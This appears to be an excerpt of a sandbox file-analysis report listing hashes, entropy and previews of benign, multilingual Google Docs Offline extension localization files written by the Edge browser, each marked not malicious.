                                                                                                                                                                SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1305
                                                                                                                                                                Entropy (8bit):4.673517697192589
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):911
                                                                                                                                                                Entropy (8bit):4.6294343834070935
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):939
                                                                                                                                                                Entropy (8bit):4.451724169062555
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):977
                                                                                                                                                                Entropy (8bit):4.622066056638277
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):972
                                                                                                                                                                Entropy (8bit):4.621319511196614
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):990
                                                                                                                                                                Entropy (8bit):4.497202347098541
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1658
                                                                                                                                                                Entropy (8bit):4.294833932445159
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1672
                                                                                                                                                                Entropy (8bit):4.314484457325167
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):935
                                                                                                                                                                Entropy (8bit):4.6369398601609735
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1065
                                                                                                                                                                Entropy (8bit):4.816501737523951
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2771
                                                                                                                                                                Entropy (8bit):3.7629875118570055
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):858
                                                                                                                                                                Entropy (8bit):4.474411340525479
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):954
                                                                                                                                                                Entropy (8bit):4.6457079159286545
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):899
                                                                                                                                                                Entropy (8bit):4.474743599345443
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2230
                                                                                                                                                                Entropy (8bit):3.8239097369647634
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
